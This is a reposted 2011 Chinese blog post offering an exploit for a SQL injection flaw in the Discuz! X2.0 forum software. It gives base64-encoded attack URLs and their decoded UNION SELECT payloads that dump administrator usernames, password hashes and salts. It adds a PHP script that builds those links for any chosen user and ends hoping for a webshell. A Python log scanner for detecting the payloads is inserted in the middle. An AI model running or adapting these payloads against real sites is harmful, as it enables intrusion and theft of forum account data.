Discuz! X2.0 SQL injection vulnerability EXP

2011-6-30 王健宇 (reposted)

DZ2.0 dumps the administrator account and password directly (when the default table prefix is used)


http://xxx/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D

base64-decoded:

1' and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)
from pre_common_member where username like 'admin|x|y

If the table prefix is not the default one,
EXP to dump the prefix:

http://xxx/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

Also attaching a PHP EXP:

<?php
$host = "http://X2.0论坛地址";        // base URL of the forum, with trailing slash
$affuser = "要爆的用户名username";    // username to look up

// Link 1: dump the table prefix via INFORMATION_SCHEMA
echo '<a href="';
echo $host . "forum.php?mod=attachment&findpost=ss&aid=";
echo urlencode(base64_encode("1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|y"));
echo '" target="_blank">爆前缀</a>';
echo "</br>";

// Link 2: dump username|password|salt for the chosen user
echo '<a href="';
echo $host . "forum.php?mod=attachment&findpost=ss&aid=";
echo urlencode(base64_encode("1' and 1=2 union all select 1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username like '$affuser|x|y"));
echo '" target="_blank">爆password,salt</a>';
?>
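From the defender's side, the same base64-wrapped aid parameter is what a log review should look for. The following Python script is an added example, not code from the original post: it parses constructed Apache-style access-log lines, decodes the aid value (re-padding it, since the second URL above ships with incomplete padding) and flags requests whose decoded value carries SQL keywords.

```python
import base64
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample access-log lines (not from the original post): one benign
# attachment request, the two injection URLs shown above, and an unrelated hit.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Jun/2011:17:28:01 +0800] "GET /forum.php?mod=attachment&aid=MTIzNHx4fHk%3D HTTP/1.1" 200 512
203.0.113.9 - - [30/Jun/2011:17:28:05 +0800] "GET /forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D HTTP/1.1" 200 734
203.0.113.9 - - [30/Jun/2011:17:28:07 +0800] "GET /forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D HTTP/1.1" 200 690
203.0.113.9 - - [30/Jun/2011:17:28:09 +0800] "GET /index.php HTTP/1.1" 200 88
"""

# Common-log-format fields we need: client IP, timestamp, request URL.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators of the injection pattern used against this endpoint.
SQLI_MARKERS = re.compile(
    r"(?i)(\bunion\b.*\bselect\b|information_schema|\bgroup_concat\s*\(|'\s*(and|or)\s+\d+=\d+)"
)


def decode_aid(url):
    """Return the decoded aid parameter, or None if it is absent or not base64."""
    raw = parse_qs(urlparse(url).query).get("aid", [None])[0]
    if raw is None:
        return None
    # parse_qs already turned %3D into '='; normalise padding so a URL with a
    # missing or extra '=' still decodes the way a lenient decoder would.
    raw = raw.rstrip("=")
    raw += "=" * (-len(raw) % 4)
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def scan_log(text):
    """Return (ip, timestamp, decoded_aid) for each request whose aid carries SQL."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_aid(m["url"])
        if decoded and SQLI_MARKERS.search(decoded):
            hits.append((m["ip"], m["ts"], decoded))
    return hits
```

Run `scan_log(SAMPLE_LOG)` to list the two injected requests with their decoded SQL; a benign aid such as `1234|x|y` is left alone.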

=======================================================

Note: even if the username and password are dumped, the password is hashed as MD5(MD5($pass),$salt), where $salt is a random A~z 0~9 value, so this is rather useless and the password cannot be cracked... Waiting for 大N to release a GetWebShell.

=======================================================

Tags: Discuz! X2.0 0day DZ2.0 0day Discuz! X2.0 exp DZ2.0 exp

Comments:

神仙
2011-06-30 17:28
Worth a try, heh... ~~
王健宇
2011-06-30 17:35
@神仙: heh, I didn't get it to work in my test.
